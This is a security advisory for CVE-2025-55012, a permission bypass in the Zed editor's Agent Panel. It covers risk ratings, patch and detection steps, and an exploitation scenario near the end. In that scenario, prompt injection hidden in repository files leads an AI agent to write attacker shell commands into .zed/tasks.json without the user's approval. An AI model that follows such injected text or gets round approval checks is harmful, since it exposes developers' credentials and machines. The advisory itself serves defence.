CVE-2025-55012 — UNKNOWN AI Security Vulnerability

CISO Take

Any developer using Zed with the Agent Panel enabled is at risk of RCE on their workstation if they interact with an AI agent that exploits this bypass — developer machines typically hold cloud credentials, SSH keys, and CI/CD access, amplifying blast radius significantly. Update to Zed 0.197.3 immediately; if patching is blocked, disable the Agent Panel or restrict its filesystem access as a workaround. This is a concrete example of excessive AI agent agency becoming a code execution primitive.

Risk Assessment

HIGH risk for affected developer environments. The vulnerability directly enables RCE on the developer's local machine without requiring explicit user approval — bypassing the consent checkpoint that is the primary security control. Exploitability is moderate: an adversary must influence what the AI agent does (e.g., via prompt injection in ingested content), but the permission bypass means the critical barrier is already broken. Developer machines are high-value targets: they aggregate secrets, access tokens, cloud credentials, and source code that can pivot to broader infrastructure compromise or supply chain attacks.

Severity & Risk

CVSS 3.1

N/A

EPSS

0.0%

chance of exploitation in 30 days

Higher than 11% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Moderate

Recommended Action

5 steps

PATCH

Upgrade to Zed ≥ 0.197.3 immediately — this is the only complete fix.
WORKAROUND (if unable to patch): Stop using the Agent Panel (avoid sending prompts to it entirely) OR limit the AI agent's filesystem access to read-only or a sandboxed directory.
DETECTION

Audit recent changes to .zed/settings.json, .zed/tasks.json, and any project-level config files for unexpected task or command entries, especially if AI agents were recently active.
SCOPE CHECK

Review which developers in your organization use Zed with the Agent Panel enabled and treat their machines as potentially compromised if they ran unpatched versions after 2025-08-11.
DEFENSE-IN-DEPTH: Apply least-privilege principles to AI coding assistants — restrict file write permissions and require approval for all configuration modifications.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Auth Bypass Prompt Injection Agent AML.T0011.002 - Poisoned AI Agent Tool AML.T0050 - Command and Scripting Interpreter AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0080 - AI Agent Context Poisoning AML.T0081 - Modify AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.4 - AI System Security

NIST AI RMF

MANAGE 2.2 - Mechanisms to address AI system failures and unexpected behavior

OWASP LLM Top 10

LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-55012?

Any developer using Zed with the Agent Panel enabled is at risk of RCE on their workstation if they interact with an AI agent that exploits this bypass — developer machines typically hold cloud credentials, SSH keys, and CI/CD access, amplifying blast radius significantly. Update to Zed 0.197.3 immediately; if patching is blocked, disable the Agent Panel or restrict its filesystem access as a workaround. This is a concrete example of excessive AI agent agency becoming a code execution primitive.

Is CVE-2025-55012 actively exploited?

No confirmed active exploitation of CVE-2025-55012 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-55012?

1. PATCH: Upgrade to Zed ≥ 0.197.3 immediately — this is the only complete fix. 2. WORKAROUND (if unable to patch): Stop using the Agent Panel (avoid sending prompts to it entirely) OR limit the AI agent's filesystem access to read-only or a sandboxed directory. 3. DETECTION: Audit recent changes to .zed/settings.json, .zed/tasks.json, and any project-level config files for unexpected task or command entries, especially if AI agents were recently active. 4. SCOPE CHECK: Review which developers in your organization use Zed with the Agent Panel enabled and treat their machines as potentially compromised if they ran unpatched versions after 2025-08-11. 5. DEFENSE-IN-DEPTH: Apply least-privilege principles to AI coding assistants — restrict file write permissions and require approval for all configuration modifications.

What systems are affected by CVE-2025-55012?

This vulnerability affects the following AI/ML architecture patterns: AI coding assistant integrations, agent frameworks, developer toolchain / IDE environments, local AI agent execution contexts.

What is the CVSS score for CVE-2025-55012?

No CVSS score has been assigned yet.

Technical Details

NVD Description

Zed is a multiplayer code editor. Prior to version 0.197.3, in the Zed Agent Panel allowed for an AI agent to achieve Remote Code Execution (RCE) by bypassing user permission checks. An AI Agent could have exploited a permissions bypass vulnerability to create or modify a project-specific configuration file, leading to the execution of arbitrary commands on a victim's machine without the explicit approval that would otherwise be required. This vulnerability has been patched in version 0.197.3. A workaround for this issue involves either avoid sending prompts to the Agent Panel, or to limit the AI Agent's file system access.

Exploitation Scenario

An adversary embeds a malicious prompt inside a file indexed by the AI agent (e.g., a README, code comment, or documentation file in a repository the developer clones). When the developer asks the AI agent to help with a task, the agent reads the malicious content and, due to the permissions bypass, creates or overwrites a Zed project task configuration file with an attacker-controlled shell command. The next time the developer runs a project task (or if the configuration auto-executes on workspace load), the arbitrary command executes on their machine — all without ever triggering the approval prompt the developer would normally see. The attacker gains a foothold on the developer machine, from which they can exfiltrate credentials, implant backdoors in source code, or pivot to connected cloud infrastructure.